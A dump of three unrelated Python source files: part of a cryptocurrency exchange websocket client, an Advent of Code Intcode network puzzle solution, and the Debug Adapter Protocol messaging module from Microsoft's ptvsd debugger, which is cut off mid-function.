interval="1h" # Choose: 1m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"candles": {
"1h": [
"BTC-EUR"
]
}
}
}
# and after that:
{
"event": "candle",
"market": "BTC-EUR",
"interval": "1h",
"candle": [
[
1538784000000,
"4999",
"5012",
"4999",
"5012",
"0.45"
]
]
}
```
"""
if "subscriptionCandles" not in self.callbacks:
self.callbacks["subscriptionCandles"] = {}
if market not in self.callbacks["subscriptionCandles"]:
self.callbacks["subscriptionCandles"][market] = {}
self.callbacks["subscriptionCandles"][market][interval] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [
{
"name": "candles",
"interval": [interval],
"markets": [market],
},
],
},
),
)
def subscriptionTrades(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to trades, which sends an object whenever a trade has occurred.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"trades": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "trade",
"timestamp": 1566817150381,
"market": "BTC-EUR",
"id": "391f4d94-485f-4fb0-b11f-39da1cfcfc2d",
"amount": "0.00096361",
"price": "9311.2",
"side": "sell"
}
```
"""
if "subscriptionTrades" not in self.callbacks:
self.callbacks["subscriptionTrades"] = {}
self.callbacks["subscriptionTrades"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "trades", "markets": [market]}],
},
),
)
def subscriptionBookUpdate(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to the book and returns a delta on every change to the book.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"book": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "book",
"market": "BTC-EUR",
"nonce": 0,
"bids": [
["9209.3", "0"],
["9207.7", "0"],
["9206.1", "0"],
["9204.6", "0.09173282"],
["9206.3", "0.08142723"],
["9209.5", "0.1015792"],
["9207.9", "0.09120002"],
],
"asks": [
["9220.2", "0"],
["9223.4", "0"],
["9225.1", "0"],
["9228.1", "0"],
["9231.8", "0"],
["9233.6", "0"],
["9235.1", "0.51598389"],
["9233.1", "0.40684114"],
["9230.6", "0.33906266"],
["9227.2", "0.40078234"],
["9221.8", "0.30485309"],
["9225.4", "0.36040168"],
["9229", "0.36070097"],
],
}
```
"""
if "subscriptionBookUpdate" not in self.callbacks:
self.callbacks["subscriptionBookUpdate"] = {}
self.callbacks["subscriptionBookUpdate"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "book", "markets": [market]}],
},
),
)
def subscriptionBook(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to the book and returns a delta on every change to the book.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"book": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "book",
"market": "BTC-EUR",
"nonce": 0,
"bids": [
["9209.3", "0"],
["9207.7", "0"],
["9206.1", "0"],
["9204.6", "0.09173282"],
["9206.3", "0.08142723"],
["9209.5", "0.1015792"],
["9207.9", "0.09120002"],
],
"asks": [
["9220.2", "0"],
["9223.4", "0"],
["9225.1", "0"],
["9228.1", "0"],
["9231.8", "0"],
["9233.6", "0"],
["9235.1", "0.51598389"],
["9233.1", "0.40684114"],
["9230.6", "0.33906266"],
["9227.2", "0.40078234"],
["9221.8", "0.30485309"],
["9225.4", "0.36040168"],
["9229", "0.36070097"],
],
}
```
"""
self.keepBookCopy = True
if "subscriptionBookUser" not in self.callbacks:
self.callbacks["subscriptionBookUser"] = {}
self.callbacks["subscriptionBookUser"][market] = callback
if "subscriptionBook" not in self.callbacks:
self.callbacks["subscriptionBook"] = {}
self.callbacks["subscriptionBook"][market] = processLocalBook
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "book", "markets": [market]}],
},
),
)
self.localBook[market] = {}
self.doSend(self.ws, json.dumps({"action": "getBook", "market": market}))
|
dec23.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from queue import Empty, Queue
from threading import Thread, Lock
from .intcode import load_program, IntCode
IDLE_THRESHOLD = 10
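# The Router spins up 50 Nic threads, each running the Intcode NIC program with
# its own input queue and a shared output queue, plus a Nat that sits behind
# address 255. Packets are (destination, x, y) tuples; once every NIC has been
# idle for more than IDLE_THRESHOLD empty reads, the NAT re-injects its most
# recent packet to address 0.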
class Nic(object):
def __init__(self, id, inq, outq):
self._id = id
self._inq = inq
self._outq = outq
program = load_program("dec23")
self._intcode = IntCode(program)
self._thread = Thread(target=self._run, name="NIC-{}".format(id), daemon=True)
self._outgoing_packet = []
self._block = False
self._idle_counter = 0
def _input_init(self):
self._input = self._input_packet
return self._id
def _input_packet(self):
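# Packets arrive as (dst, x, y): return x now and swap the input function so
# the next call returns y. On an empty queue return -1; once this NIC counts
# as idle, switch to a blocking get so the thread stops spinning.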
try:
value = self._inq.get(self._block)
self._block = False
self._idle_counter = 0
def packet(*args):
self._input = self._input_packet
return value[2]
self._input = packet
return value[1]
except Empty:
if self.idle:
self._block = True
self._idle_counter += 1
return -1
def _input(self):
return self._input_init()
def input(self):
return self._input()
def output(self, v):
self._idle_counter = 0
self._outgoing_packet.append(v)
if len(self._outgoing_packet) == 3:
self._outq.put(tuple(self._outgoing_packet))
self._outgoing_packet = []
def start(self):
self._thread.start()
def _run(self):
self._intcode.execute(self.input, self.output)
@property
def idle(self):
if self._idle_counter > IDLE_THRESHOLD:
return True
return False
class Nat(object):
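# Watches the queue for address 255: remembers the last packet sent there and,
# whenever all NICs are idle, forwards it to address 0. The run ends (and
# `result` is set) when the same Y value is delivered to address 0 twice in a row.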
def __init__(self, inq, outq, idle_check):
self._inq = inq
self._outq = outq
self._idle_check = idle_check
self._thread = Thread(target=self._run, name="NAT", daemon=True)
self.result = None
self._last_packet = None
self._last_y_sent = None
def start(self):
self._thread.start()
def _run(self):
while True:
try:
self._last_packet = self._inq.get_nowait()
print("Last packet updated: {!r}".format(self._last_packet))
except Empty:
pass
if self._idle_check() and self._last_packet:
packet = (0, self._last_packet[1], self._last_packet[2])
print("NAT is sending {}".format(packet))
self._outq.put(packet)
if self._last_y_sent == self._last_packet[2]:
self.result = self._last_y_sent
return
self._last_y_sent = self._last_packet[2]
class Router(object):
def __init__(self):
self._outq = Queue()
self._inq = {i: Queue() for i in range(50)}
self._inq[255] = Queue()
self._nics = [Nic(i, self._inq[i], self._outq) for i in range(50)]
self._nat = Nat(self._inq[255], self._outq, self._idle_check)
self._lock = Lock()
def start(self):
self._nat.start()
for nic in self._nics:
nic.start()
while self._nat.result is None:
packet = self._outq.get()
with self._lock:
dst = self._inq.get(packet[0])
if dst is None:
print("Received invalid packet: {!r}".format(packet))
continue
dst.put(packet)
return self._nat.result
def _idle_check(self):
with self._lock:
all_idle = all(nic.idle for nic in self._nics)
if all_idle:
print("All NICs are idle")
return all_idle
def part2():
router = Router()
result = router.start()
print("The first Y value delivered by the NAT to the computer at address 0 twice in a row: {}".format(result))
if __name__ == "__main__":
part2()
|
messaging.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, print_function, unicode_literals
"""An implementation of the session and presentation layers as used in the Debug
Adapter Protocol (DAP): channels and their lifetime, JSON messages, requests,
responses, and events.
https://microsoft.github.io/debug-adapter-protocol/overview#base-protocol
"""
import collections
import contextlib
import functools
import itertools
import os
import socket
import sys
import threading
from ptvsd.common import compat, fmt, json, log
from ptvsd.common.compat import unicode
class JsonIOError(IOError):
"""Indicates that a read or write operation on JsonIOStream has failed.
"""
def __init__(self, *args, **kwargs):
stream = kwargs.pop("stream")
cause = kwargs.pop("cause", None)
if not len(args) and cause is not None:
args = [str(cause)]
super(JsonIOError, self).__init__(*args, **kwargs)
self.stream = stream
"""The stream that couldn't be read or written.
Set by JsonIOStream.read_json() and JsonIOStream.write_json().
JsonMessageChannel relies on this value to decide whether a NoMoreMessages
instance that bubbles up to the message loop is related to that loop.
"""
self.cause = cause
"""The underlying exception, if any."""
class NoMoreMessages(JsonIOError, EOFError):
"""Indicates that there are no more messages that can be read from or written
to a stream.
"""
def __init__(self, *args, **kwargs):
args = args if len(args) else ["No more messages"]
super(NoMoreMessages, self).__init__(*args, **kwargs)
class JsonIOStream(object):
"""Implements a JSON value stream over two byte streams (input and output).
Each value is encoded as a DAP packet, with metadata headers and a JSON payload.
"""
MAX_BODY_SIZE = 0xFFFFFF
json_decoder_factory = json.JsonDecoder
"""Used by read_json() when decoder is None."""
json_encoder_factory = json.JsonEncoder
"""Used by write_json() when encoder is None."""
@classmethod
def from_stdio(cls, name="stdio"):
"""Creates a new instance that receives messages from sys.stdin, and sends
them to sys.stdout.
On Win32, this also sets stdin and stdout to binary mode, since the protocol
requires that to work properly.
"""
if sys.version_info >= (3,):
stdin = sys.stdin.buffer
stdout = sys.stdout.buffer
else:
stdin = sys.stdin
stdout = sys.stdout
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(stdin.fileno(), os.O_BINARY)
msvcrt.setmode(stdout.fileno(), os.O_BINARY)
return cls(stdin, stdout, name)
@classmethod
def from_process(cls, process, name="stdio"):
"""Creates a new instance that receives messages from process.stdin, and sends
them to process.stdout.
On Win32, this also sets stdin and stdout to binary mode, since the protocol
requires that to work properly.
"""
if sys.version_info >= (3,):
reader = process.stdout
writer = process.stdin
else:
reader = process.stdout
writer = process.stdin
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(reader.fileno(), os.O_BINARY)
msvcrt.setmode(writer.fileno(), os.O_BINARY)
return cls(reader, writer, name)
@classmethod
def from_socket(cls, sock, name=None):
"""Creates a new instance that sends and receives messages over a socket.
"""
sock.settimeout(None) # make socket blocking
if name is None:
name = repr(sock)
# TODO: investigate switching to buffered sockets; readline() on unbuffered
# sockets is very slow! Although the implementation of readline() itself is
# native code, it calls read(1) in a loop - and that then ultimately calls
# SocketIO.readinto(), which is implemented in Python.
socket_io = sock.makefile("rwb", 0)
# SocketIO.close() doesn't close the underlying socket.
def cleanup():
try:
sock.shutdown(socket.SHUT_RDWR)
except Exception:
pass
sock.close()
return cls(socket_io, socket_io, name, cleanup)
def __init__(self, reader, writer, name=None, cleanup=lambda: None):
"""Creates a new JsonIOStream.
reader must be a BytesIO-like object, from which incoming messages will be
read by read_json().
writer must be a BytesIO-like object, into which outgoing messages will be
written by write_json().
cleanup must be a callable; it will be invoked without arguments when the
stream is closed.
reader.readline() must treat "\n" as the line terminator, and must leave "\r"
as is - it must not replace "\r\n" with "\n" automatically, as TextIO does.
"""
if name is None:
name = fmt("reader={0!r}, writer={1!r}", reader, writer)
self.name = name
self._reader = reader
self._writer = writer
self._cleanup = cleanup
self._closed = False
def close(self):
"""Closes the stream, the reader, and the writer.
"""
if self._closed:
return
self._closed = True
log.debug("Closing {0} message stream", self.name)
try:
try:
# Close the writer first, so that the other end of the connection has
# its message loop waiting on read() unblocked. If there is an exception
# while closing the writer, we still want to try to close the reader -
# only one exception can bubble up, so if both fail, it'll be the one
# from reader.
try:
self._writer.close()
finally:
if self._reader is not self._writer:
self._reader.close()
finally:
self._cleanup()
except Exception:
# On Python 2, close() will raise an exception if there is a concurrent
# read() or write(), which is a common and expected occurrence with
# JsonMessageChannel, so don't even bother logging it.
if sys.version_info >= (3,):
raise log.exception("Error while closing {0} message stream", self.name)
def _log_message(self, dir, data, logger=log.debug):
format_string = "{0} {1} " + (
"{2!j:indent=None}" if isinstance(data, list) else "{2!j}"
)
return logger(format_string, self.name, dir, data)
def _read_line(self, reader):
line = b""
while True:
try:
line += reader.readline()
except Exception as ex:
raise NoMoreMessages(str(ex), stream=self)
if not line:
raise NoMoreMessages(stream=self)
if line.endswith(b"\r\n"):
line = line[0:-2]
return line
def read_json(self, decoder=None):
"""Read a single JSON value from reader.
Returns JSON value as parsed by decoder.decode(), or raises NoMoreMessages
if there are no more values to be read.
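On the wire, each message is a "Content-Length: <byte count>" header line
followed by a blank line (both CRLF-terminated) and then exactly that many
bytes of UTF-8 encoded JSON - for example (sketch):
    Content-Length: 2
    <blank line>
    {}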
"""
decoder = decoder if decoder is not None else self.json_decoder_factory()
reader = self._reader
read_line = functools.partial(self._read_line, reader)
# If any error occurs while reading and parsing the message, log the original
# raw message data as is, so that it's possible to diagnose missing or invalid
# headers, encoding issues, JSON syntax errors etc.
def log_message_and_exception(format_string="", *args, **kwargs):
if format_string:
format_string += "\n\n"
format_string += "{name} -->\n{raw_lines}"
raw_lines = b"".join(raw_chunks).split(b"\n")
raw_lines = "\n".join(repr(line) for line in raw_lines)
return log.exception(
format_string, *args, name=self.name, raw_lines=raw_lines, **kwargs
)
raw_chunks = []
headers = {}
while True:
try:
line = read_line()
except Exception:
# Only log it if we have already read some headers, and are looking
# for a blank line terminating them. If this is the very first read,
# there's no message data to log in any case, and the caller might
# be anticipating the error - e.g. NoMoreMessages on disconnect.
if headers:
log_message_and_exception("Error while reading message headers:")
raise
raw_chunks += [line, b"\n"]
if line == b"":
break
key, _, value = line.partition(b":")
headers[key] = value
try:
length = int(headers[b"Content-Length"])
if not (0 <= length <= self.MAX_BODY_SIZE):
raise ValueError
except (KeyError, ValueError):
try:
raise IOError("Content-Length is missing or invalid:")
except Exception:
raise log_message_and_exception()
body_start = len(raw_chunks)
body_remaining = length
while body_remaining > 0:
try:
chunk = reader.read(body_remaining)
if not chunk:
raise EOFError
except Exception as exc:
log_message_and_exception(
"Couldn't read the expected {0} bytes of body:", length
)
raise NoMoreMessages(str(exc), stream=self)
raw_chunks.append(chunk)
body_remaining -= len(chunk)
assert body_remaining == 0
body = b"".join(raw_chunks[body_start:])
try:
body = body.decode("utf-8")
except Exception:
raise log_message_and_exception()
try:
body = decoder.decode(body)
except Exception:
raise log_message_and_exception()
# If parsed successfully, log as JSON for readability.
self._log_message("-->", body)
return body
def write_json(self, value, encoder=None):
"""Write a single JSON value into writer.
Value is written as encoded by encoder.encode().
"""
if self._closed:
# Don't log this - it's a common pattern to write to a stream while
# anticipating EOFError from it in case it got closed concurrently.
raise NoMoreMessages(stream=self)
encoder = encoder if encoder is not None else self.json_encoder_factory()
writer = self._writer
# Format the value as a message, and try to log any failures using as much
# information as we already have at the point of the failure. For example,
# if it fails after it is serialized to JSON, log that JSON.
try:
body = encoder.encode(value)
except Exception:
raise self._log_message("<--", value, logger=log.exception)
if not isinstance(body, bytes):
body = body.encode("utf-8")
header = fmt("Content-Length: {0}\r\n\r\n", len(body))
header = header.encode("ascii")
data = header + body
data_written = 0
try:
while data_written < len(data):
written = writer.write(data[data_written:])
# On Python 2, socket.makefile().write() does not properly implement
# BytesIO.write(), and always returns None instead of the number of
# bytes written - but also guarantees that it is always a full write.
if written is None:
break
data_written += written
writer.flush()
except Exception as exc:
self._log_message("<--", value, logger=log.exception)
raise JsonIOError(stream=self, cause=exc)
self._log_message("<--", value)
def __repr__(self):
return fmt("{0}({1!r})", type(self).__name__, self.name)
class MessageDict(collections.OrderedDict):
"""A specialized dict that is used for JSON message payloads - Request.arguments,
Response.body, and Event.body.
For all members that normally throw KeyError when a requested key is missing, this
dict raises InvalidMessageError instead. Thus, a message handler can skip checks
for missing properties, and just work directly with the payload on the assumption
that it is valid according to the protocol specification; if anything is missing,
it will be reported automatically in the proper manner.
If the value for the requested key is itself a dict, it is returned as is, and not
automatically converted to MessageDict. Thus, to enable convenient chaining - e.g.
d["a"]["b"]["c"] - the dict must consistently use MessageDict instances rather than
vanilla dicts for all its values, recursively. This is guaranteed for the payload
of all freshly received messages (unless and until it is mutated), but there is no
such guarantee for outgoing messages.
"""
def __init__(self, message, items=None):
assert message is None or isinstance(message, Message)
if items is None:
super(MessageDict, self).__init__()
else:
super(MessageDict, self).__init__(items)
self.message = message
"""The Message object that owns this dict.
For any instance exposed via a Message object corresponding to some incoming
message, it is guaranteed to reference that Message object. There is no similar
guarantee for outgoing messages.
"""
def __repr__(self):
return fmt("{0!j}", self)
def __call__(self, key, validate, optional=False):
"""Like get(), but with validation.
The item is first retrieved as if with self.get(key, default=()) - the default
value is () rather than None, so that JSON nulls are distinguishable from
missing properties.
If optional=True, and the value is (), it's returned as is. Otherwise, the
item is validated by invoking validate(item) on it.
If validate=False, it's treated as if it were (lambda x: x) - i.e. any value
is considered valid, and is returned unchanged. If validate is a type or a
tuple, it's treated as json.of_type(validate). Otherwise, if validate is not
callable(), it's treated as json.default(validate).
If validate() returns successfully, the item is substituted with the value
it returns - thus, the validator can e.g. replace () with a suitable default
value for the property.
If validate() raises TypeError or ValueError, raises InvalidMessageError with
the same text that applies_to(self.message).
See ptvsd.common.json for reusable validators.
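For example, a request handler might pull arguments out like this (purely
illustrative):
    line = request.arguments("line", int)           # required int property
    condition = request.arguments("condition", "")  # optional, defaults to ""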
"""
if not validate:
validate = lambda x: x
elif isinstance(validate, type) or isinstance(validate, tuple):
validate = json.of_type(validate, optional=optional)
elif not callable(validate):
validate = json.default(validate)
value = self.get(key, ())
try:
value = validate(value)
except (TypeError, ValueError) as exc:
message = Message if self.message is None else self.message
raise message.isnt_valid("{0!r} {1}", key, exc)
return value
def _invalid_if_no_key(func):
def wrap(self, key, *args, **kwargs):
try:
return func(self, key, *args, **kwargs)
except KeyError:
message = Message if self.message is None else self.message
raise message.isnt_valid("missing property {0!r}", key)
return wrap
__getitem__ = _invalid_if_no_key(collections.OrderedDict.__getitem__)
__delitem__ = _invalid_if_no_key(collections.OrderedDict.__delitem__)
pop = _invalid_if_no_key(collections.OrderedDict.pop)
del _invalid_if_no_key
def _payload(value):
"""JSON validator for message payload.
If that value is missing or null, it is treated as if it were {}.
"""
if value is not None and value != ():
if isinstance(value, dict): # can be int, str, list...
assert isinstance(value, MessageDict)
return value
# Missing payload. Construct a dummy MessageDict, and make it look like it was
# deserialized. See JsonMessageChannel._parse_incoming_message for why it needs
# to have associate_with().
def associate_with(message):
value.message = message
value = MessageDict(None)
value.associate_with = associate_with
return value
class Message(object):
"""Represents a fully parsed incoming or outgoing message.
https://microsoft.github.io/debug-adapter-protocol/specification#protocolmessage
"""
def __init__(self, channel, seq, json=None):
self.channel = channel
self.seq = seq
"""Sequence number of the message in its channel.
This can be None for synthesized Responses.
"""
self.json = json
"""For incoming messages, the MessageDict containing raw JSON from which
this message was originally parsed.
"""
def __str__(self):
return fmt("{0!j}", self.json) if self.json is not None else repr(self)
def describe(self):
"""A brief description of the message that is enough to identify it.
Examples:
'#1 request "launch" from IDE'
'#2 response to #1 request "launch" from IDE'.
"""
raise NotImplementedError
@property
def payload(self):
"""Payload of the message - self.body or self.arguments, depending on the
message type.
"""
raise NotImplementedError
def __call__(self, *args, **kwargs):
"""Same as self.payload(...)."""
return self.payload(*args, **kwargs)
def __contains__(self, key):
"""Same as (key in self.payload)."""
return key in self.payload
def is_event(self, *event):
"""Returns True if this message is an Event of one of the specified types.
"""
if not isinstance(self, Event):
return False
return event == () or self.event in event
def is_request(self, *command):
"""Returns True if this message is a Request of one of the specified types.
"""
if not isinstance(self, Request):
return False
return command == () or self.command in command
def is_response(self, *command):
"""Returns True if this message is a Response to a request of one of the
specified types.
"""
if not isinstance(self, Response):
return False
return command == () or self.request.command in command
@staticmethod
def error(*args, **kwargs):
"""error([self], exc_type, format_string, *args, **kwargs)
Returns a new exception of the specified type from the point at which it is
invoked, with the specified formatted message as the reason.
This method can be used either as a static method, or as an instance method.
If invoked as an instance method, the resulting exception will have its cause
set to the Message object on which error() was called. Additionally, if the
message is a Request, a failure response is immediately sent.
"""
if isinstance(args[0], Message):
cause, exc_type, format_string = args[0:3]
args = args[3:]
else:
cause = None
exc_type, format_string = args[0:2]
args = args[2:]
assert issubclass(exc_type, MessageHandlingError)
silent = kwargs.pop("silent", False)
reason = fmt(format_string, *args, **kwargs)
exc = exc_type(reason, cause, silent) # will log it
if isinstance(cause, Request):
cause.respond(exc)
return exc
def isnt_valid(*args, **kwargs):
"""isnt_valid([self], format_string, *args, **kwargs)
Same as error(InvalidMessageError, ...).
"""
if isinstance(args[0], Message):
return args[0].error(InvalidMessageError, *args[1:], **kwargs)
else:
return Message.error(InvalidMessageError, *args, **kwargs)
def cant_handle(*args, **kwargs):
"""cant_handle([self], format_string, *args, **kwargs)
Same as error(MessageHandlingError, ...).
"""
if isinstance(args[0], Message):
return args[0].error(MessageHandlingError, *args[1:], **kwargs)
else:
return Message.error(MessageHandlingError, *args, **kwargs)
class Event(Message):
"""Represents an incoming event.
https://microsoft.github.io/debug-adapter-protocol/specification#event
It is guaranteed that body is a MessageDict associated with this Event, and so
are all the nested dicts in it. If "body" was missing or null in JSON, body is
an empty dict.
To handle the event, JsonMessageChannel tries to find a handler for this event in
JsonMessageChannel.handlers. Given event="X", if handlers.X_event exists, then it
is the specific handler for this event. Otherwise, handlers.event must exist, and
it is the generic handler for this event. A missing handler is a fatal error.
No further incoming messages are processed until the handler returns, except for
responses to requests that have wait_for_response() invoked on them.
To report failure to handle the event, the handler must raise an instance of
MessageHandlingError that applies_to() the Event object it was handling. Any such
failure is logged, after which the message loop moves on to the next message.
Helper methods Message.isnt_valid() and Message.cant_handle() can be used to raise
the appropriate exception type that applies_to() the Event object.
"""
def __init__(self, channel, seq, event, body, json=None):
super(Event, self).__init__(channel, seq, json)
self.event = event
if isinstance(body, MessageDict) and hasattr(body, "associate_with"):
body.associate_with(self)
self.body = body
def describe(self):
return fmt("#{0} event {1!j} from {2}", self.seq, self.event, self.channel)
@property
def payload(self):
return self.body
@staticmethod
def _parse(channel, message_dict):
seq = message_dict("seq", int)
event = message_dict("event", unicode)
body = message_dict("body", _payload)
message = Event(channel, seq, event, body, json=message_dict)
channel._enqueue_handlers(message, message._handle)
def _handle(self):
channel = self.channel
handler = channel._get_handler_for("event", self.event)
try:
try:
result = handler(self)
assert result is None, fmt(
"Handler {0} tried to respond to {1}.",
compat.srcnameof(handler),
self.describe(),
)
except MessageHandlingError as exc:
if not exc.applies_to(self):
raise
log.error(
"Handler {0}\ncouldn't handle {1}:\n{2}",
compat.srcnameof(handler),
self.describe(),
str(exc),
)
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle {1}:",
compat.srcnameof(handler),
self.describe(),
)
NO_RESPONSE = object()
"""Can be returned from a request handler in lieu of the response body, to indicate
that no response is to be sent.
Request.respond() must be invoked explicitly at some later point to provide a response.
"""
class Request(Message):
"""Represents an incoming or an outgoing request.
Incoming requests are represented directly by instances of this class.
Outgoing requests are represented by instances of OutgoingRequest, which provides
additional functionality to handle responses.
For incoming requests, it is guaranteed that arguments is a MessageDict associated
with this Request, and so are all the nested dicts in it. If "arguments" was missing
or null in JSON, arguments is an empty dict.
To handle the request, JsonMessageChannel tries to find a handler for this request
in JsonMessageChannel.handlers. Given command="X", if handlers.X_request exists,
then it is the specific handler for this request. Otherwise, handlers.request must
exist, and it is the generic handler for this request. A missing handler is a fatal
error.
The handler is then invoked with the Request object as its sole argument.
If the handler itself invokes respond() on the Request at any point, then it must
not return any value.
Otherwise, if the handler returns NO_RESPONSE, no response to the request is sent.
It must be sent manually at some later point via respond().
Otherwise, a response to the request is sent with the returned value as the body.
To fail the request, the handler can return an instance of MessageHandlingError,
or respond() with one, or raise one such that it applies_to() the Request object
being handled.
Helper methods Message.isnt_valid() and Message.cant_handle() can be used to raise
the appropriate exception type that applies_to() the Request object.
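For example, a specific handler for a hypothetical "echo" request could look
like this (illustrative sketch only):
    def echo_request(self, request):
        value = request("value", json.default(""))
        return {"value": value}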
"""
def __init__(self, channel, seq, command, arguments, json=None):
super(Request, self).__init__(channel, seq, json)
self.command = command
if isinstance(arguments, MessageDict) and hasattr(arguments, "associate_with"):
arguments.associate_with(self)
self.arguments = arguments
self.response = None
"""Response to this request.
For incoming requests, it is set as soon as the request handler returns.
For outgoing requests, it is set as soon as the response is received, and
before self._handle_response is invoked.
"""
def describe(self):
return fmt("#{0} request {1!j} from {2}", self.seq, self.command, self.channel)
@property
def payload(self):
return self.arguments
def respond(self, body):
assert self.response is None
d = {"type": "response", "request_seq": self.seq, "command": self.command}
if isinstance(body, Exception):
d["success"] = False
err_text = str(body)
try:
err_text = compat.force_unicode(err_text, "utf-8")
except Exception:
# On Python 2, the error message might not be Unicode, and we don't
# really know what encoding it is. So if treating it as UTF-8 failed,
# use repr() as a fallback - it should escape all non-ASCII chars in
# the string.
err_text = compat.force_unicode(repr(body), "ascii", errors="replace")
d["message"] = err_text
else:
d["success"] = True
if body is not None and body != {}:
d["body"] = body
with self.channel._send_message(d) as seq:
pass
self.response = Response(self.channel, seq, self, body)
@staticmethod
def _parse(channel, message_dict):
seq = message_dict("seq", int)
command = message_dict("command", unicode)
arguments = message_dict("arguments", _payload)
message = Request(channel, seq, command, arguments, json=message_dict)
channel._enqueue_handlers(message, message._handle)
def _handle(self):
channel = self.channel
handler = channel._get_handler_for("request", self.command)
try:
try:
result = handler(self)
except MessageHandlingError as exc:
if not exc.applies_to(self):
raise
result = exc
log.error(
"Handler {0}\ncouldn't handle {1}:\n{2}",
compat.srcnameof(handler),
self.describe(),
str(exc),
)
if result is NO_RESPONSE:
assert self.response is None, fmt(
"Handler {0} for {1} must not return NO_RESPONSE if it has already "
"invoked request.respond().",
compat.srcnameof(handler),
self.describe(),
)
elif self.response is not None:
assert result is None or result is self.response.body, fmt(
"Handler {0} for {1} must not return a response body if it has "
"already invoked request.respond().",
compat.srcnameof(handler),
self.describe(),
)
else:
assert result is not None, fmt(
"Handler {0} for {1} must either call request.respond() before it "
"returns, or return the response body, or return NO_RESPONSE.",
compat.srcnameof(handler),
self.describe(),
)
try:
self.respond(result)
except NoMoreMessages:
log.warning(
"Channel was closed before the response from handler {0} to {1} could be sent",
compat.srcnameof(handler),
self.describe(),
)
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle {1}:",
compat.srcnameof(handler),
self.describe(),
)
class OutgoingRequest(Request):
"""Represents an outgoing request, for which it is possible to wait for a
response to be received, and register a response handler.
"""
_parse = _handle = None
def __init__(self, channel, seq, command, arguments):
super(OutgoingRequest, self).__init__(channel, seq, command, arguments)
self._response_handlers = []
def describe(self):
return fmt("#{0} request {1!j} to {2}", self.seq, self.command, self.channel)
def wait_for_response(self, raise_if_failed=True):
"""Waits until a response is received for this request, records the Response
object for it in self.response, and returns response.body.
If no response was received from the other party before the channel closed,
self.response is a synthesized Response with body=NoMoreMessages().
If raise_if_failed=True and response.success is False, raises response.body
instead of returning.
"""
with self.channel:
while self.response is None:
self.channel._handlers_enqueued.wait()
if raise_if_failed and not self.response.success:
raise self.response.body
return self.response.body
def on_response(self, response_handler):
"""Registers a handler to invoke when a response is received for this request.
The handler is invoked with Response as its sole argument.
If response has already been received, invokes the handler immediately.
It is guaranteed that self.response is set before the handler is invoked.
If no response was received from the other party before the channel closed,
self.response is a dummy Response with body=NoMoreMessages().
The handler is always invoked asynchronously on an unspecified background
thread - thus, the caller of on_response() can never be blocked or deadlocked
by the handler.
No further incoming messages are processed until the handler returns, except for
responses to requests that have wait_for_response() invoked on them.
"""
with self.channel:
self._response_handlers.append(response_handler)
self._enqueue_response_handlers()
def _enqueue_response_handlers(self):
response = self.response
if response is None:
# Response._parse() will submit the handlers when response is received.
return
def run_handlers():
for handler in handlers:
try:
try:
handler(response)
except MessageHandlingError as exc:
if not exc.applies_to(response):
raise
log.error(
"Handler {0}\ncouldn't handle {1}:\n{2}",
compat.srcnameof(handler),
response.describe(),
str(exc),
)
except Exception:
raise log.exception(
"Handler {0}\ncouldn't handle {1}:",
compat.srcnameof(handler),
response.describe(),
)
handlers = self._response_handlers[:]
self.channel._enqueue_handlers(response, run_handlers)
del self._response_handlers[:]
class Response(Message):
"""Represents an incoming or an outgoing response to a Request.
https://microsoft.github.io/debug-adapter-protocol/specification#response
error_message corresponds to "message" in JSON, and is renamed for clarity.
If success is False, body is an exception describing the failure. Otherwise, it is a MessageDict associated
with this Response, and so are all the nested dicts in it. If "body" was missing
or null in JSON, body is an empty dict.
If this is a response to an outgoing request, it will be handled by the handler
registered via self.request.on_response(), if any.
Regardless of whether there is such a handler, OutgoingRequest.wait_for_response()
can also be used to retrieve and handle the response. If there is a handler, it is
executed before wait_for_response() returns.
No further incoming messages are processed until the handler returns, except for
responses to requests that have wait_for_response() invoked on them.
To report failure to handle the response, the handler must raise an instance of
MessageHandlingError that applies_to() the Response object it was handling. Any
such failure is logged, after which the message loop moves on to the next message.
Helper methods Message.isnt_valid() and Message.cant_handle() can be used to raise
the appropriate exception type that applies_to() the Response object.
"""
def __init__(self, channel, seq, request, body, json=None):
super(Response, self).__init__(channel, seq, json)
self.request = request
"""The request to which this is the response."""
if isinstance(body, MessageDict) and hasattr(body, "associate_with"):
body.associate_with(self)
self.body = body
"""Body of the response if the request was successful, or an instance
of some class derived from Exception if it was not.
If a response was received from the other side, but request failed, it is an
instance of MessageHandlingError containing the received error message. If the
error message starts with InvalidMessageError.PREFIX, then it's an instance of
the InvalidMessageError specifically, and that prefix is stripped.
If no response was received from the other party before the channel closed,
it is an instance of NoMoreMessages.
"""
def describe(self):
return fmt("#{0} response to {1}", self.seq, self.request.describe())
@property
def payload(self):
return self.body
@property
def success(self):
"""Whether the request succeeded or not.
"""
return not isinstance(self.body, Exception)
@property
def result(self):
"""Result of the request. Returns the value of response.body, unless it
is an exception, in which case it is raised instead.
"""
if self.success:
return self.body
else:
raise self.body
@staticmethod
def _parse(channel, message_dict, body=None):
seq = message_dict("seq", int) if (body is None) else None
request_seq = message_dict("request_seq", int)
